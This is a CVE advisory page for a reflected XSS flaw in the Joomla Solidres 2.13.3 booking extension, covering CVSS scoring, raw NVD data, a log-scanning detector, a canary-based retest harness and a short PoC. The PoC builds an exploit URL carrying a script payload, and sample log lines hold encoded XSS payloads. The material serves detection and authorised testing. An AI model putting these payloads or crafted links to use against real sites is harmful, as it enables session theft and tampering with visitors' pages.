Security Vulnerability Report
CVE-2023-54363 CVSS 6.1 MEDIUM

CVE-2023-54363

Published: 2026-04-09 21:16:06
Last Modified: 2026-04-15 15:00:33

Description

Joomla Solidres 2.13.3 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating multiple GET parameters including show, reviews, type_id, distance, facilities, categories, prices, location, and Itemid. Attackers can craft malicious URLs containing JavaScript payloads in these parameters to steal session tokens, login credentials, or manipulate site content when victims visit the crafted links.
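The description names the injectable GET parameters, which is all a defender needs to look for exploitation attempts in web-server access logs. The following detection script is an added example, not part of the advisory and not Solidres code: it parses combined-format log lines, keeps only requests to option=com_solidres, decodes each listed parameter (including double-encoded values) and flags HTML/JS injection markers. The log lines in SAMPLE_LOG are constructed for illustration.

```python
# Added detection example, not part of the advisory or of Solidres.
# Flags web-server access-log requests to com_solidres that carry
# HTML/JS injection markers in the parameters named in CVE-2023-54363.
# The log lines in SAMPLE_LOG are constructed for illustration.
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Parameters listed in the CVE description.
VULN_PARAMS = {"show", "reviews", "type_id", "distance", "facilities",
               "categories", "prices", "location", "Itemid"}

# Coarse injection markers checked against the fully decoded value:
# an HTML tag that can carry script, a javascript: URL, or an on* handler.
XSS_MARKERS = re.compile(
    r"<\s*/?\s*(script|img|svg|iframe|body|object|embed)\b"
    r"|javascript\s*:"
    r"|\bon[a-z]+\s*=",
    re.IGNORECASE,
)

# Apache/nginx combined log format: ip ident user [ts] "METHOD url PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_fully(value, rounds=3):
    """Strip up to `rounds` layers of percent-encoding so that double-encoded
    payloads (%253Cscript%253E) are inspected in their final form."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyse_request(url):
    """Return {param: decoded_value} for suspicious Solidres parameters in one
    request URL, or {} when the request is not for com_solidres or looks clean."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if query.get("option") != ["com_solidres"]:
        return {}
    hits = {}
    for name, values in query.items():
        if name not in VULN_PARAMS:
            continue
        for value in values:  # parse_qs already removed one encoding layer
            decoded = decode_fully(value)
            if XSS_MARKERS.search(decoded):
                hits[name] = decoded
    return hits


def scan_log(lines):
    """Run analyse_request over combined-format log lines; unparsable lines are skipped."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = analyse_request(m["url"])
        if hits:
            findings.append({"ip": m["ip"], "ts": m["ts"],
                             "status": m["status"], "params": hits})
    return findings


# Constructed sample: one benign search, one plain payload in `show`,
# one double-encoded attribute breakout in `Itemid`, one unrelated component.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Apr/2026:10:00:01 +0000] "GET /index.php?option=com_solidres&view=base&show=list&Itemid=101 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Apr/2026:10:00:02 +0000] "GET /index.php?option=com_solidres&view=base&show=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 5200 "-" "curl/8.0"',
    '198.51.100.7 - - [10/Apr/2026:10:00:03 +0000] "GET /index.php?option=com_solidres&Itemid=101%2522%2520onmouseover%253Dalert(1) HTTP/1.1" 200 5200 "-" "curl/8.0"',
    '203.0.113.9 - - [10/Apr/2026:10:00:04 +0000] "GET /index.php?option=com_content&show=%3Cscript%3E HTTP/1.1" 200 4100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} params={f['params']}")
```

The marker regex is deliberately coarse (a value such as online=1 would trip the on*= clause), so treat hits as triage candidates and tune to your traffic. A 200 status on a flagged request tells you the page was served, not that the script executed; the request was still reflected to whoever followed the link, so pivot on the source IP and referer to find the delivery vector.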

CVSS Details

CVSS 3.1 (Primary)
CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVSS 4.0 (Secondary)
CVSS Score
5.1
Severity
MEDIUM
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Weakness
CWE-79 (Improper Neutralization of Input During Web Page Generation)

Reading the vectors: no privileges are needed to build the link, but a victim must open it (UI:R in 3.1, UI:A in 4.0), and the injected script runs in the victim's browser under the site's origin rather than on the server, which is why 3.1 scores the scope as changed (S:C) and 4.0 places the low confidentiality and integrity impact on the subsequent system (SC:L/SI:L) with none on the vulnerable one.

Configurations (Affected Products)

No CPE configuration data is available for this entry (NVD status: Deferred). The affected product named in the description is:

Joomla Solidres 2.13.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.

```python
# PoC Code for CVE-2023-54363
# Demonstrates Reflected XSS in Joomla Solidres
import urllib.parse

# The vulnerable GET parameters identified in the advisory
VULNERABLE_PARAMS = ['show', 'reviews', 'type_id', 'distance', 'facilities',
                     'categories', 'prices', 'location', 'Itemid']


def generate_exploit_url(base_url, param='show'):
    """Build a crafted URL that places the payload in one of the
    reflected parameters ('show' by default)."""
    if param not in VULNERABLE_PARAMS:
        raise ValueError(f"{param!r} is not one of the parameters named in the advisory")

    # Simple JavaScript payload to demonstrate vulnerability
    payload = '<script>alert("CVE-2023-54363 XSS")</script>'

    params = {
        'option': 'com_solidres',
        'view': 'base',
        param: payload,
    }

    # urlencode percent-encodes the payload; the server decodes it and
    # reflects it into the page without escaping.
    query_string = urllib.parse.urlencode(params)
    return f"{base_url}?{query_string}"


if __name__ == "__main__":
    target = "http://example.com/index.php"
    print(f"[+] Exploit URL: {generate_exploit_url(target)}")
    print("[+] Send this URL to an authenticated user to trigger the XSS.")
```
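An alert() box proves little during a test and nothing during a retest after a patch. The script below is an added example, not the advisory's PoC and not Solidres code: it probes every parameter named in the CVE with a unique, inert canary tag and classifies how the response reflects it (raw, entity-encoded, or not at all). The fetch callback is injectable so the same harness runs against an authorised target with urllib or requests; fake_solidres is a constructed stand-in that lets the example run offline.

```python
# Added verification example, not the advisory's PoC and not Solidres code.
# Probes each parameter named in CVE-2023-54363 with a unique canary tag and
# reports whether the response reflects it raw, entity-encoded, or not at all.
# `fake_solidres` is a constructed stand-in for a live site so this runs offline.
import html
import secrets
from urllib.parse import parse_qs, urlencode, urlsplit

VULN_PARAMS = ["show", "reviews", "type_id", "distance", "facilities",
               "categories", "prices", "location", "Itemid"]


def make_canary():
    """Return (token, canary). The canary is a bogus tag: inert if rendered,
    but unambiguous to search for in the response."""
    token = secrets.token_hex(4)
    return token, f"<x{token}>"


def build_probe(base_url, param, value):
    """Same request shape as the PoC above, with `value` in the chosen parameter."""
    query = {"option": "com_solidres", "view": "base", param: value}
    return f"{base_url}?{urlencode(query)}"


def classify_reflection(body, token):
    """'unescaped' if the raw tag is in the HTML (script would execute in an
    element context), 'escaped' if it came back as &lt;...&gt;, else 'absent'."""
    raw = f"<x{token}>"
    if raw in body:
        return "unescaped"
    if html.escape(raw) in body:
        return "escaped"
    return "absent"


def probe_all(base_url, fetch):
    """fetch(url) -> response body as str (e.g. urllib or requests against an
    authorised target). Returns {param: verdict} for every listed parameter."""
    verdicts = {}
    for param in VULN_PARAMS:
        token, canary = make_canary()
        body = fetch(build_probe(base_url, param, canary))
        verdicts[param] = classify_reflection(body, token)
    return verdicts


def fake_solidres(url):
    """Constructed stand-in: echoes `show` unescaped (the vulnerable pattern),
    echoes `location` through html.escape (the fixed pattern), ignores the rest."""
    query = parse_qs(urlsplit(url).query)
    show = query.get("show", [""])[0]
    location = query.get("location", [""])[0]
    return (f"<html><body><div id='show'>{show}</div>"
            f"<input name='location' value=\"{html.escape(location, quote=True)}\">"
            f"</body></html>")


if __name__ == "__main__":
    for param, verdict in probe_all("http://example.com/index.php", fake_solidres).items():
        print(f"{param:<11} {verdict}")
```

The canary only detects element-context reflection; a value echoed inside an attribute or a JavaScript string needs a context-specific canary (a closing quote, or a closing script tag) and a matching check. A verdict of escaped for every parameter is the evidence to attach to a retest. Note also that stealing the session cookie, as the description mentions, is blocked when it is HttpOnly, but script running in the site's origin can still act as the victim through the page itself.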

References

http://solidres.com/
https://extensions.joomla.org/extension/vertical-markets/booking-a-reservations/solidres/
https://www.exploit-db.com/exploits/51638
https://www.vulncheck.com/advisories/joomla-solidres-reflected-xss-via-multiple-parameters

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2023-54363",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-09T21:16:05.907",
    "lastModified": "2026-04-15T15:00:32.790",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Joomla Solidres 2.13.3 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating multiple GET parameters including show, reviews, type_id, distance, facilities, categories, prices, location, and Itemid. Attackers can craft malicious URLs containing JavaScript payloads in these parameters to steal session tokens, login credentials, or manipulate site content when victims visit the crafted links."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 5.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "NONE",
            "userInteraction": "ACTIVE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE",
            "vulnAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "LOW",
            "subIntegrityImpact": "LOW",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "http://solidres.com/",
        "source": "[email protected]"
      },
      {
        "url": "https://extensions.joomla.org/extension/vertical-markets/booking-a-reservations/solidres/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.exploit-db.com/exploits/51638",
        "source": "[email protected]"
      },
      {
        "url": "https://www.vulncheck.com/advisories/joomla-solidres-reflected-xss-via-multiple-parameters",
        "source": "[email protected]"
      }
    ]
  }
}
```